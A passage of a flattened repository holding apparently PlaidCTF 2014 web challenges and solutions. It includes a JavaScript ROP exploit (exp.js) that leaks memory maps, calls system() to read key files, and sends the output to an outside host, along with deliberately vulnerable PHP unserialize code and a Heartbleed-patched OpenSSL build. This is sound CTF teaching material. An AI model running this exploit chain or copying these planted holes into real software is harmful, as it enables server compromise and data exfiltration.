60 | char *otp = NULL; 61 | 62 | size_t x; 63 | getline(&username, &x, stdin); 64 | getline(&password, &x, stdin); 65 | getline(&otp, &x, stdin); 66 | 67 | int login_success = verify_otp(username, password, otp); 68 | 69 | free(username); 70 | free(password); 71 | free(otp); 72 | 73 | if (login_success) { 74 | puts("
  • OTP correct...
    • "); 75 | return 0; 76 | } 77 | 78 | puts("
  • OTP incorrect!
    • "); 79 | return 1; 80 | } 81 | -------------------------------------------------------------------------------- /web/bronies/login/www/checkotp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/bronies/login/www/checkotp -------------------------------------------------------------------------------- /web/bronies/login/www/index.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 10 | 11 | 12 | eXtreme Secure Solutions Internal Portal 13 | 14 | 15 | 16 | 17 |
    18 |

    eXtreme Secure Solutions Internal Portal

    19 |
    20 | Flag #1: xss_problem_is_web_problem
    21 | This challenge has one more flag. Break into the internal server to capture it! 22 |
    23 |

    24 | You are logged in as . 25 |

    26 |

    27 | Reminder: For security reasons, all internet traffic is blocked on the Bigson. 28 |

    29 |

    30 | 40 |

    41 | 45 |
    46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | eXtreme Secure Solutions Internal Login 54 | 55 | 56 | 57 | 58 |
    59 |

    eXtreme Secure Solutions Internal Login

    60 |
    61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 |
    78 |
    79 |
    80 | 81 | 82 | 83 | -------------------------------------------------------------------------------- /web/bronies/login/www/login.php: -------------------------------------------------------------------------------- 1 | 9 | 10 |

    Login status

    11 |
      12 | array("pipe", "r"), 15 | 1 => array("pipe", "w"), 16 | ); 17 | 18 | $p = proc_open("./checkotp 2>&1", $descriptorspec, $pipes); 19 | fwrite($pipes[0], $username . "\n"); 20 | fwrite($pipes[0], $password . "\n"); 21 | fwrite($pipes[0], $otp . "\n"); 22 | fclose($pipes[0]); 23 | echo stream_get_contents($pipes[1]); 24 | fclose($pipes[1]); 25 | $otp_correct = proc_close($p) == 0; 26 | 27 | $login_correct = false; 28 | if ($username !== "ebleford" || md5($password) !== "86d0b09363e0346792f72cdfe3559537") { 29 | echo '
    • Username or password incorrect!
      • '; 30 | } else { 31 | echo '
    • Login correct...
      • '; 32 | $login_correct = true; 33 | } 34 | ?> 35 |
    36 | window.location='/';"; 41 | echo "Logged in!"; 42 | } 43 | ?> 44 | 45 | -------------------------------------------------------------------------------- /web/bronies/login/www/logout.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /web/bronies/solution/exp.js: -------------------------------------------------------------------------------- 1 | function request(url) { 2 | var xhr = new XMLHttpRequest(); 3 | xhr.open('GET', url, false); 4 | xhr.send(null); 5 | return xhr.responseText; 6 | } 7 | 8 | function rep(x, n) { 9 | return Array(n + 1).join(x); 10 | } 11 | 12 | function ljust(s, x, n) { 13 | return (s + rep(x, n)).slice(0, n) 14 | } 15 | 16 | function rjust(s, x, n) { 17 | return (rep(x, n) + s).slice(-n) 18 | } 19 | 20 | function pack(d) { 21 | var result = ''; 22 | for (var i = 0; i < 8; ++i) { 23 | result += '%' + rjust((d & 0xff).toString(16), '0', 2); 24 | d /= 256; 25 | } 26 | return result; 27 | } 28 | 29 | var url = 'http://bigson.essolutions.largestctf.com' 30 | var proc_maps = request(url + '/index?file=/proc/self/maps'); 31 | var lines = proc_maps.split('\n'); 32 | var libc_base = null; 33 | var libcpp_base = null; 34 | for (var i in lines) { 35 | if (libc_base == null && lines[i].indexOf('libc') != -1) { 36 | libc_base = parseInt(lines[i].split('-')[0], 16); 37 | } 38 | if (libcpp_base == null && lines[i].indexOf('libstdc++') != -1) { 39 | libcpp_base = parseInt(lines[i].split('-')[0], 16); 40 | } 41 | } 42 | 43 | prompt(); 44 | 45 | var system = libc_base + 0x3ff80 46 | 47 | /* 48 | b6a22: 49 89 f4 mov %rsi,%r12 49 | b6a25: 48 89 d5 mov %rdx,%rbp 50 | b6a28: ff 50 30 callq *0x30(%rax) 51 | */ 52 | var gadget1 = libcpp_base + 0xb6a22 53 | 54 | /* 55 | 7b2b7: 4c 89 e7 mov %r12,%rdi 56 | 7b2ba: ff 50 60 callq *0x60(%rax) 57 | */ 58 | var gadget2 = libcpp_base + 0x7b2b7 59 | 60 | function encode(s) { 61 | var result = ''; 62 | for (var i in s) { 63 | if (s[i] == ' ' || s[i] == '\n' || s[i] == '&' || s[i] == '#') { 64 | result += '%' + rjust(s.charCodeAt(i).toString(16), '0', 2); 65 | } else { 66 | result += s[i]; 67 | } 68 | } 69 | return result; 70 | } 71 | 72 | function exploit(command) { 73 | command = ljust(command, 'A', 0x30); 74 | command += pack(gadget2); 75 | command += rep('A', 0x28); 76 | command += pack(system); 77 | 78 | var key1 = rep('B', 257); 79 | var value1 = rep('C', 0x18) + pack(gadget1); 80 | var key2 = ljust(encode(command), 'X', 256); 81 | var value2 = "E" 82 | 83 | var target_url = url + '/index?' + key1 + '=' + value1 + '&' + key2 + '=' + value2; 84 | try { 85 | var response = request(target_url); 86 | } catch (e) { 87 | return null; 88 | } 89 | 90 | return response; 91 | } 92 | 93 | exploit("(id;cat *key*)>/tmp/@;#"); 94 | var x = request(url + '/index?file=/tmp/@'); 95 | exploit("rm /tmp/@;#"); 96 | window.location = 'https://rzhou.org/?ctf=' + escape(x); 97 | -------------------------------------------------------------------------------- /web/bronies/solution/xss.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | XSS 6 | 7 | 8 | 9 |
    10 | 11 | 12 | 13 |
    14 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /web/bronies/victim/victim.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import time 4 | import hashlib 5 | import hmac 6 | import struct 7 | from selenium import webdriver 8 | from selenium.webdriver.common.keys import Keys 9 | import beanstalkc 10 | import multiprocessing 11 | 12 | NPROCS=16 13 | LOGIN_URL = 'http://portal.essolutions.largestctf.com/' 14 | XSS_SITE = 'http://54.196.225.30/' 15 | HMAC_KEY = '34a23eb4a5dc54e73c459cb1a1ecad22' 16 | 17 | def frob(s): 18 | return ''.join(chr(ord(x)^42) for x in s) 19 | 20 | def generate_otp(username, password): 21 | tok = (username + '\n:' + frob(password + '\n') + ':' + 22 | struct.pack(' 2 | 3 | halphow2js 4 | 5 | 6 | 7 | 
     8 | 
 9 |
    10 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /web/halphow2js/mkcert.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | IP=i.dont.know:8001 3 | test -z "$1" && echo You could give me an ip:port to make a proper cert... or not care. || IP="$1" 4 | openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 100 -nodes -subj '/C=US/O=PlaidCTF/OU=halphow2js/CN='"$IP" 5 | -------------------------------------------------------------------------------- /web/halphow2js/script.js: -------------------------------------------------------------------------------- 1 | var FLAG="XXXXXXXXXXXXXXXXXXXXXX"; // <- Try submitting that, I dare you. 2 | 3 | // JJJJJJJJJJJAAAAAAAAAAAAVVVVVVVVVVAAAAAAAAAAAASSSSSSSSSSCCCCCCCCCCCRRRRRRRRRRIIIIIIIIIIPPPPPPPPPPPPPTTTTTTTTTTTTT 4 | 5 | function mystop(z) { 6 | for(var xxx = 5; xxx < 50; xxx+=5) { 7 | var yyy = (function stopb(b) { return b < 0 ? function(n){return Infinity;} : function stop(n) { 8 | return (function(s){return s && (s= a.length ? undefined : x%1 || !x || x == n ? (function(){a.splice(i,1); return xia(a[i],i,a);})() : x; 12 | }).filter(function(x){return x;}).map(stopb(b-1)))); 13 | // i'll make a JAVASCRIPT problem SO HARD that EVEN MATH CAN'T SOLVE IT 14 | }; })(xxx)(z); 15 | if(yyy != Infinity) return yyy; 16 | } 17 | } 18 | mystop.sbox = {2:1, 1:1, 4:1}; 19 | 20 | function filter() { 21 | var args = [].slice.apply(arguments).sort().filter(function(x,i,a){return a.indexOf(x) == i;}); 22 | if(args.length != 5) return "uniq"; 23 | 24 | var flag = false; args.map(function(x){flag |= x >= 999;}); 25 | if(flag) return "big"; 26 | 27 | var m = args.map(mystop); 28 | 29 | if(m.filter(function(x,i){return m[2]+3*i == x;}).length < 3) return "unsexy"; 30 | if(m.filter(function(x,i){return x == args[i];}).length < 3) return "hippopotamus"; 31 | if(m.filter(function(x,i){return x > m[i-1];}).length > 3) return "banana phone"; 32 | 33 | return FLAG; 34 | } 35 | 36 | function self_test() { 37 | // SLOW SLOW SLOW self test 38 | var checksum1 = 15661; 39 | var checksum2 = 19; 40 | var i = 999; 41 | while(--i > 0) { 42 | var x = mystop(i); 43 | if(!(0 < x && x < 50)) return false; 44 | checksum1 -= x; 45 | checksum2 ^= x; 46 | } 47 | return checksum1 === 0 && checksum2 === 0; 48 | } 49 | 50 | function client_side() { 51 | var x,y,z,w,ww; 52 | while(1) { 53 | x = prompt("#1", '1'); if(!x) return; 54 | y = prompt("#2", '2'); if(!y) return; 55 | z = prompt("#3", '3'); if(!z) return; 56 | w = prompt("#YOLO", '420'); if(!w) return; 57 | ww = prompt("#PPP", '123'); if(!ww) return; 58 | 59 | // The best solutions run FAST! 60 | // So, skip the slow self test if you've got a solution! 61 | if(filter(x,y,z,w,ww) == FLAG) break; 62 | 63 | if(!self_test()) { 64 | alert("Sanity check failed! Get a better javascript!"); 65 | return; 66 | } 67 | alert("Pick better numbers, man."); 68 | } 69 | call_server(x,y,z,w,ww, function(x) { alert(x); }); 70 | } 71 | 72 | function call_server(x,y,z,w,ww,handler) { 73 | xmlhttp = new XMLHttpRequest(); 74 | var port = "80" 75 | if(document.location.port) port = document.location.port; 76 | xmlhttp.open("GET", "https://"+document.location.hostname+":"+port+ // arrr, where be my C format stringsss 77 | "/myajax?x="+x+"&y="+y+"&z="+z+"&w="+w+"&ww="+ww, true); // CSTYLE4LYFE 78 | xmlhttp.onreadystatechange = function(){ 79 | if(xmlhttp.readyState==4 && xmlhttp.status==200) { 80 | handler(string=xmlhttp.responseText); 81 | } 82 | } 83 | xmlhttp.send(); 84 | } 85 | // JJJJJJJJJJJAAAAAAAAAAAAVVVVVVVVVVAAAAAAAAAAAASSSSSSSSSSCCCCCCCCCCCRRRRRRRRRRIIIIIIIIIIPPPPPPPPPPPPPTTTTTTTTTTTTT 86 | 87 | // NNNNNNNNNNOOOOOOOOOOOOOOOOOODDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEE 88 | function server_side() { 89 | var server_cache = require('./server_cache.js'); 90 | FLAG = require('./server_flag.js').FLAG; // scripte flage 91 | var https = require('https'); 92 | var fs = require('fs'); 93 | var url = require('url'); 94 | 95 | https.createServer({ 96 | key: fs.readFileSync('./key.pem'), 97 | cert: fs.readFileSync('./cert.pem') 98 | }, function(request, response) { 99 | var location = url.parse(request.url, true); 100 | var path = location.pathname; 101 | var query = location.query; 102 | 103 | var respondWithFile = function(path, type) { 104 | fs.readFile(path, function(err, file) { 105 | if(err) { 106 | response.writeHead(500, { 'Content-Type': 'text/plain' }); 107 | response.end('five double oh', "utf-8"); 108 | return; 109 | } 110 | response.writeHead(200, { 'Content-Type': type ? type : 'text/plain' }); 111 | response.end(file, "utf-8"); 112 | }); 113 | } 114 | 115 | if(path==="/myajax") { 116 | console.log(url.parse(request.url, false).query); // lol what R U n00bs sending, anyways 117 | setTimeout(function() { 118 | 119 | /////////////////////////////////// 120 | mystop.sbox = server_cache.sbox; // Don't run the server into the ground, kthxbai 121 | /////////////////////////////////// Server would logically be the same with or without this. 122 | 123 | if(!self_test()) { 124 | response.writeHead(500, {"Content-Type": "text/plain"}); 125 | response.end("nigga, I AM BROKE", "utf-8"); 126 | } 127 | 128 | response.writeHead(200, {"Content-Type": "text/plain"}); 129 | 130 | var fff = "nope"; 131 | try { 132 | fff = filter(query.x, query.y, query.z, query.w, query.ww); 133 | } catch(e) {} 134 | var sss = "CHEATER :P. Ping clockish if you can:\n"; 135 | sss += "\t1. Visit this site, unmodified, NOTHING PATCHED OUT, in Chrome.\n"; 136 | sss += "\t2. Enter numbers in USING THE DIALOG BOXES that pop up. No manual calls!\n"; 137 | sss += "\t3. Somehow still manage to see this response from the server.\n"; 138 | sss += "It shouldn't be possible, but then again I have no idea what I'm doing."; 139 | // OH MY GOD WHAT IS JAVASCRIPT WHERE AM I WHAT IS NODE HALP HOW 2 JS 140 | response.end(fff == FLAG ? FLAG : sss, "utf-8"); 141 | }, 2000); 142 | } 143 | else if(path==="/" || path==="/index.html") { 144 | respondWithFile('./index.html', 'text/html'); 145 | } 146 | else if(path==="/script.js") { 147 | respondWithFile('./script.js', 'text/javascript'); // This file is me! Haaiii! 148 | } 149 | else if(path==="/server_flag.js") { 150 | response.writeHead(401, {"Content-Type": "text/plain"}); 151 | response.end("nowaaaaiii"); 152 | } 153 | else if(path==="/server_cache.js") { 154 | // respondWithFile('./server_cache.js', 'text/javascript'); 155 | // return; 156 | response.writeHead(401, {"Content-Type": "text/plain"}); 157 | response.end("I bet y'all wish you knew MATH or JAVASCRIPT or SOMETHING."); 158 | } 159 | else { 160 | response.writeHead(404, { 'Content-Type': 'text/html' }); 161 | response.end("four oh four", "utf-8"); 162 | } 163 | }).listen(8001); 164 | } 165 | 166 | try {document;} catch(ReferenceError) {server_side();} 167 | // NNNNNNNNNNOOOOOOOOOOOOOOOOOODDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEE 168 | -------------------------------------------------------------------------------- /web/halphow2js/server_flag.js: -------------------------------------------------------------------------------- 1 | module.exports = { FLAG: "w00t_i_are_mastar_web_hackar" }; 2 | -------------------------------------------------------------------------------- /web/heartbleed/Makefile: -------------------------------------------------------------------------------- 1 | # MUST make clean if flag changes! 2 | THE_FLAG := flag{hey_guise_we_made_a_heartbleed} 3 | HOSTNAME := 54.82.147.138 4 | PORT := 45373 5 | 6 | ifneq (Linux,$(shell uname)) 7 | $(error A combination of nginx and openssl suckage makes building wrong on os x and probably elsewhere) 8 | endif 9 | 10 | .PHONY: all clean veryclean cleanforrunning 11 | all: nginx nginx.conf cert.crt cert.key heartbleed.sh heartbleedroot/index.html 12 | 13 | clean: 14 | rm -Rf openssl-1.0.1f nginx-1.5.12 nginx nginx.conf cert.crt cert.key heartbleed.sh heartbleedroot bin include lib ssl 15 | 16 | veryclean: clean 17 | rm -Rf openssl-1.0.1f.tar.gz nginx-1.5.12.tar.gz 18 | 19 | cleanforrunning: 20 | rm -Rf openssl-1.0.1f.tar.gz openssl-1.0.1f nginx-1.5.12.tar.gz nginx-1.5.12 21 | 22 | openssl-1.0.1f.tar.gz: 23 | curl -LO http://www.openssl.org/source/openssl-1.0.1f.tar.gz 24 | 25 | nginx-1.5.12.tar.gz: 26 | curl -LO http://nginx.org/download/nginx-1.5.12.tar.gz 27 | 28 | cert.crt: cert.key 29 | cert.key: Makefile 30 | rm -Rf '$@' 31 | openssl req -x509 -newkey rsa:2048 -nodes -days 7 -keyout cert.key -out cert.crt -extensions v3_req -subj '/C=US/O=PlaidCTF/OU=Heartbleed/CN=$(HOSTNAME)' 32 | chmod go-wx '$@' 33 | chmod a+r '$@' # Server process needs to be able to read this. 34 | 35 | define PYREPLACE 36 | oldcode = "memcpy(bp, pl, payload);" 37 | newcode = """{ 38 | const char *theflag = "$(THE_FLAG)"; 39 | int theflaglen = strlen(theflag)+1; 40 | int i; 41 | for(i = 0; i < payload + padding; i++) { 42 | bp[i] = theflag[i % theflaglen]; 43 | } 44 | int x = s->s3->rrec.length - 3; 45 | if(payload < x) x = payload; 46 | memcpy(bp, pl, x); 47 | }""" 48 | from sys import argv 49 | from subprocess import Popen, PIPE 50 | def check_output(x): # TYLO. TYLO. 51 | y = Popen(x, stdout=PIPE) 52 | z = y.communicate()[0] 53 | assert y.poll() == 0 54 | return z 55 | for file in check_output(('grep', oldcode, '-Ilr', 'openssl-1.0.1f')).splitlines(): 56 | x = open(file).read() 57 | x = x.replace(oldcode, newcode) 58 | open(file, 'w').write(x) 59 | endef 60 | export PYREPLACE 61 | define NGINX_WITHOUT 62 | --without-http_userid_module \ 63 | --without-http_access_module \ 64 | --without-http_auth_basic_module \ 65 | --without-http_split_clients_module \ 66 | --without-http_proxy_module \ 67 | --without-http_fastcgi_module \ 68 | --without-http_uwsgi_module \ 69 | --without-http_scgi_module 70 | endef 71 | nginx: openssl-1.0.1f.tar.gz nginx-1.5.12.tar.gz 72 | rm -Rf openssl-1.0.1f; tar xf openssl-1.0.1f.tar.gz 73 | python -c "$$PYREPLACE" 74 | rm -Rf nginx-1.5.12; tar xf nginx-1.5.12.tar.gz 75 | cd nginx-1.5.12 && ./configure $(NGINX_WITHOUT) --with-openssl="`pwd`/../openssl-1.0.1f" --with-http_ssl_module && make -j1 # wow, openssl requires -j1 76 | cp nginx-1.5.12/objs/nginx . 77 | 78 | define THE_CONFIG 79 | daemon off; 80 | pid /dev/null; 81 | error_log stderr crit; 82 | 83 | worker_processes 2; 84 | worker_priority 15; 85 | events { 86 | worker_connections 2048; 87 | } 88 | 89 | http { 90 | default_type text/html; 91 | log_not_found off; 92 | 93 | sendfile on; 94 | tcp_nopush on; 95 | 96 | client_body_buffer_size 8k; 97 | client_body_in_single_buffer on; 98 | client_body_temp_path /tmp/client_body_temp; 99 | client_max_body_size 7k; 100 | 101 | server { 102 | listen $(PORT) ssl; 103 | error_page 497 https://$$host:$$server_port$$request_uri; 104 | 105 | ssl on; 106 | ssl_certificate cert.crt; 107 | ssl_certificate_key cert.key; 108 | 109 | charset utf-8; 110 | 111 | location / { 112 | root heartbleedroot; 113 | index index.html; 114 | } 115 | } 116 | } 117 | endef 118 | export THE_CONFIG 119 | nginx.conf: Makefile 120 | echo "$$THE_CONFIG" > $@ 121 | 122 | define THE_SCRIPT 123 | #!/bin/sh 124 | cd "`dirname "$$0"`" 125 | if [ "`id -u`" = "0" ]; then 126 | echo "The Heartbleed nginx server does NOT need to be run as root!" 127 | exit 1 128 | fi 129 | mkdir -p logs 130 | ./nginx -p . -c nginx.conf 131 | endef 132 | export THE_SCRIPT 133 | heartbleed.sh: Makefile 134 | echo "$$THE_SCRIPT" > '$@' 135 | chmod a+x '$@' 136 | chmod go-w '$@' 137 | 138 | define THE_HTML 139 | 140 | 141 | 142 | Heartbleed 143 | 144 | 145 |

    146 | Heartbleed: Making GnuTLS and iOS look secure by comparison, since last Monday. 147 |

    148 | 153 | 154 | 155 | endef 156 | export THE_HTML 157 | heartbleedroot/index.html: Makefile 158 | mkdir -p heartbleedroot 159 | chmod a+rx heartbleedroot 160 | echo "$$THE_HTML" > '$@' 161 | chmod a+r '$@' 162 | chmod go-w '$@' 163 | -------------------------------------------------------------------------------- /web/kPOP/README: -------------------------------------------------------------------------------- 1 | Put up the PHP somewhere on a webserver, run db.sql to create the db; have the 2 | creds match data.php. 3 | 4 | Put flag somewhere on the machine that is not accessible from the web - make them get code-exec to do it. 5 | Alternatively put it in /home/flag/flag and write a setuid binary the way ryan and tyler have been doing it. 6 | -------------------------------------------------------------------------------- /web/kPOP/add_song.php: -------------------------------------------------------------------------------- 1 | addLyrics(array($lyricO)); 11 | User::addLyrics($res); 12 | ?> 13 | 14 | 15 | The Plague's KPop Fan Page - Added Song 16 | 17 | 18 |

    Your songs has been added! Go back to the songs page to see it!

    19 | 20 | 21 | 24 | 25 | 26 | The Plague's KPop Fan Page - Add Song 27 | 28 | 29 |

    Want to add a song? Just put the data below!

    30 |

    31 | Song name:
    32 | Group:
    33 | Video URL:
    34 | Lyrics:
    35 | 36 |

    37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /web/kPOP/classes.php: -------------------------------------------------------------------------------- 1 | matchPattern = $pattern; 8 | $this->replacement = $repl; 9 | } 10 | function filter($data) { 11 | return preg_replace($this->matchPattern, $this->replacement, $data); 12 | } 13 | }; 14 | 15 | class LogFileFormat { 16 | protected $filters; 17 | protected $endl; 18 | function __construct($filters, $endl) { 19 | $this->filters = $filters; 20 | $this->endl = $endl; 21 | } 22 | function format($txt) { 23 | foreach ($this->filters as $filter) { 24 | $txt = $filter->filter($txt); 25 | } 26 | $txt = str_replace('\n', $this->endl, $txt); 27 | return $txt; 28 | } 29 | }; 30 | 31 | class LogWriter_File { 32 | protected $filename; 33 | protected $format; 34 | function __construct($filename, $format) { 35 | $this->filename = str_replace("..", "__", str_replace("/", "_", $filename)); 36 | $this->format = $format; 37 | } 38 | function writeLog($txt) { 39 | $txt = $this->format->format($txt); 40 | file_put_contents("/var/www/sqli/unserial/logs/" . $this->filename, $txt, FILE_APPEND); 41 | } 42 | }; 43 | 44 | class Logger { 45 | protected $logwriter; 46 | function __construct($writer) { 47 | $this->logwriter = $writer; 48 | } 49 | function log($txt) { 50 | $this->logwriter->writeLog($txt); 51 | } 52 | }; 53 | 54 | class Song { 55 | protected $logger; 56 | protected $name; 57 | protected $group; 58 | protected $url; 59 | function __construct($name, $group, $url) { 60 | $this->name = $name; $this->group = $group; 61 | $this->url = $url; 62 | $fltr = new OutputFilter("/\[i\](.*)\[\/i\]/i", "\\1"); 63 | $this->logger = new Logger(new LogWriter_File("song_views", new LogFileFormat(array($fltr), "\n"))); 64 | } 65 | function __toString() { 66 | return "" . $this->name . " by " . $this->group; 67 | } 68 | function log() { 69 | $this->logger->log("Song " . $this->name . " by [i]" . $this->group . "[/i] viewed.\n"); 70 | } 71 | function get_name() { return $this->name; } 72 | } 73 | 74 | class Lyrics { 75 | protected $lyrics; 76 | protected $song; 77 | function __construct($lyrics, $song) { 78 | $this->song = $song; 79 | $this->lyrics = $lyrics; 80 | } 81 | function __toString() { 82 | return "

    " . $this->song->__toString() . "

    " . str_replace("\n", "
    ", $this->lyrics) . "

    \n"; 83 | } 84 | function __destruct() { 85 | $this->song->log(); 86 | } 87 | function shortForm() { 88 | return "

    " . $this->song->get_name() . "

    "; 89 | } 90 | function name_is($name) { 91 | return $this->song->get_name() === $name; 92 | } 93 | }; 94 | 95 | class User { 96 | static function addLyrics($lyrics) { 97 | $oldlyrics = array(); 98 | if (isset($_COOKIE['lyrics'])) { 99 | $oldlyrics = unserialize(base64_decode($_COOKIE['lyrics'])); 100 | } 101 | foreach ($lyrics as $lyric) $oldlyrics []= $lyric; 102 | setcookie('lyrics', base64_encode(serialize($oldlyrics))); 103 | } 104 | static function getLyrics() { 105 | if (isset($_COOKIE['lyrics'])) { 106 | return unserialize(base64_decode($_COOKIE['lyrics'])); 107 | } 108 | else { 109 | setcookie('lyrics', base64_encode(serialize(array(1, 2)))); 110 | return array(1, 2); 111 | } 112 | } 113 | }; 114 | 115 | class Porter { 116 | static function exportData($lyrics) { 117 | return base64_encode(serialize($lyrics)); 118 | } 119 | static function importData($lyrics) { 120 | return serialize(base64_decode($lyrics)); 121 | } 122 | }; 123 | 124 | class Conn { 125 | protected $conn; 126 | function __construct($dbuser, $dbpass, $db) { 127 | $this->conn = mysqli_connect("localhost", $dbuser, $dbpass, $db); 128 | } 129 | 130 | function getLyrics($lyrics) { 131 | $r = array(); 132 | foreach ($lyrics as $lyric) { 133 | $s = intval($lyric); 134 | $result = $this->conn->query("SELECT data FROM lyrics WHERE id=$s"); 135 | while (($row = $result->fetch_row()) != NULL) { 136 | $r []= unserialize(base64_decode($row[0])); 137 | } 138 | } 139 | return $r; 140 | } 141 | 142 | function addLyrics($lyrics) { 143 | $ids = array(); 144 | foreach ($lyrics as $lyric) { 145 | $this->conn->query("INSERT INTO lyrics (data) VALUES (\"" . base64_encode(serialize($lyric)) . "\")"); 146 | $res = $this->conn->query("SELECT MAX(id) FROM lyrics"); 147 | $id= $res->fetch_row(); $ids[]= intval($id[0]); 148 | } 149 | echo var_dump($ids); 150 | return $ids; 151 | } 152 | 153 | function __destruct() { 154 | $this->conn->close(); 155 | $this->conn = NULL; 156 | } 157 | }; 158 | 159 | -------------------------------------------------------------------------------- /web/kPOP/data.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | The Plague's KPop Fan Page - Export Songs 8 | 9 | 10 |

    The text below are your exported songs. Just have your friend copy-paste said text into the 11 | import page!

    12 |

    " . $exported . "" ?>

    13 | 14 | 15 | -------------------------------------------------------------------------------- /web/kPOP/flag: -------------------------------------------------------------------------------- 1 | One_of_our_favorite_songs_is_bubble_pop 2 | -------------------------------------------------------------------------------- /web/kPOP/import.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | The Plague's KPop Fan Page - Imported Songs 14 | 15 | 16 |

    Your songs have been imported! Go back to the songs page to see them!

    17 | 18 | 19 | 22 | 23 | 24 | The Plague's KPop Fan Page - Import Songs 25 | 26 | 27 |

    Have songs to import? Put the exported data into the field below!

    28 |

    29 | Data to import:
    30 |

    31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /web/kPOP/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | The Plague's KPop Fan Page 4 | 5 |

    Welcome to the Plague's KPop fan page! Run by world-famous hacker The Plague, this is a site 6 | where you can upload and share your KPop lyrics with your friends. Some of the Plague's favorite 7 | songs are already in your data; head over here to see them!

    8 | 9 | 10 | -------------------------------------------------------------------------------- /web/kPOP/song.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | The Plague's KPop Fan Page - Your Song 8 | 9 | 10 |

    Your song should be below, if you have it. To go back to your list of songs, go here.

    11 | getLyrics(User::getLyrics()); 13 | foreach ($lyrics as $obj) { 14 | if ($obj->name_is($name)) { 15 | echo $obj; 16 | } 17 | } 18 | ?> 19 | 20 | 21 | -------------------------------------------------------------------------------- /web/kPOP/songs.php: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | The Plague's KPop Fan Page - Your Songs 7 | 8 | 9 |

    Your songs should be listed below. In order to avoid claims of copyright infringement, your 10 | songs are stored locally. If you would like to import songs, please go 11 | here. If you would like to add your own song, please go 12 | here. If you would like to export your songs so that others 13 | may import them, please go here. 14 | Currently, we have no way to delete songs. Sorry!

    15 |

    16 | getLyrics(User::getLyrics()); 18 | foreach ($lyrics as $obj) { 19 | echo $obj->shortForm(); 20 | } 21 | ?> 22 | 23 | 24 | -------------------------------------------------------------------------------- /web/mtpox/about: -------------------------------------------------------------------------------- 1 | 2 | 3 | Magic the Plaidering Online Exchange: About 4 | 5 | 6 | 7 | 8 | 9 | 10 |
    11 |
    12 | Magic the Plaidering Online Exchange 13 | 20 |
    21 |
    22 |
    23 |
    24 |
    25 |

    The Magic the Plaidering Online Exchange is a service made available in the hope that people will exchange their Magic the Plaidering cards online, as well as possibly their 26 | PlaidCoins, a new revolutionary cryptocurrency. In order to keep our users safe, we make sure to authenticate admin cookies using an 8-byte salt. We figure that's too 27 | many bits to brute-force.

    28 |

    This service is made available in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

    29 |
    30 |
    31 |
    32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /web/mtpox/admin.php: -------------------------------------------------------------------------------- 1 | MtPOX Admin PageWelcome to the admin panel!

    Wallet ID:
    "; 30 | } 31 | } 32 | else echo "Sorry, not authorized."; 33 | ?> 34 | -------------------------------------------------------------------------------- /web/mtpox/create.sql: -------------------------------------------------------------------------------- 1 | CREATE USER 'mtpox'@'localhost' IDENTIFIED BY '200000buttcoins'; 2 | CREATE DATABASE mtpox; 3 | USE mtpox; 4 | create table plaidcoin_wallets (id varchar(40) not null, amount int(30) not null default 0, primary key(id)); 5 | INSERT INTO plaidcoin_wallets VALUES ('phpPhPphpPPPphpcoin', 1333337); 6 | GRANT ALL ON mtpox.* to 'mtpox'@'localhost'; 7 | 8 | -------------------------------------------------------------------------------- /web/mtpox/index: -------------------------------------------------------------------------------- 1 | 2 | 3 | Magic the Plaidering Online Exchange 4 | 5 | 6 | 7 | 8 | 9 | 10 |
    11 |
    12 | Magic the Plaidering Online Exchange 13 | 20 |
    21 |
    22 |
    23 |
    24 |
    25 |

    Welcome to the Magic the Plaidering Online Exchange! We hope you enjoy your stay.

    26 |

    Unfortunately, at the moment we are having technical difficulties due to having lost 27 | many PlaidCoins thanks to a bug. Therefore, our PlaidCoin and PlaidCard pages are under maintenance.

    28 |
    29 |
    30 |
    31 | 32 | 33 | -------------------------------------------------------------------------------- /web/mtpox/index.php: -------------------------------------------------------------------------------- 1 | 10 | -------------------------------------------------------------------------------- /web/mtpox/pysha256.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | __author__ = 'Thomas Dixon' 3 | __license__ = 'MIT' 4 | 5 | import copy, struct, sys 6 | 7 | def new(m=None): 8 | return sha256(m) 9 | 10 | class sha256(object): 11 | _k = (0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 12 | 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, 13 | 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 14 | 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 15 | 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 16 | 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, 17 | 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 18 | 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, 19 | 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 20 | 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 21 | 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 22 | 0xd192e819, 0xd6990624, 